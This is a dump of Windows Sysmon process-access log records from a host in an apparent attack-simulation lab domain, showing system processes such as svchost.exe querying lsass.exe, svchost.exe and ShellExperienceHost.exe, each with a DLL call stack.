13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.242{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.242{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000013164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000013162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-93FA-6005-FC04-00000000A301}37845672C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPC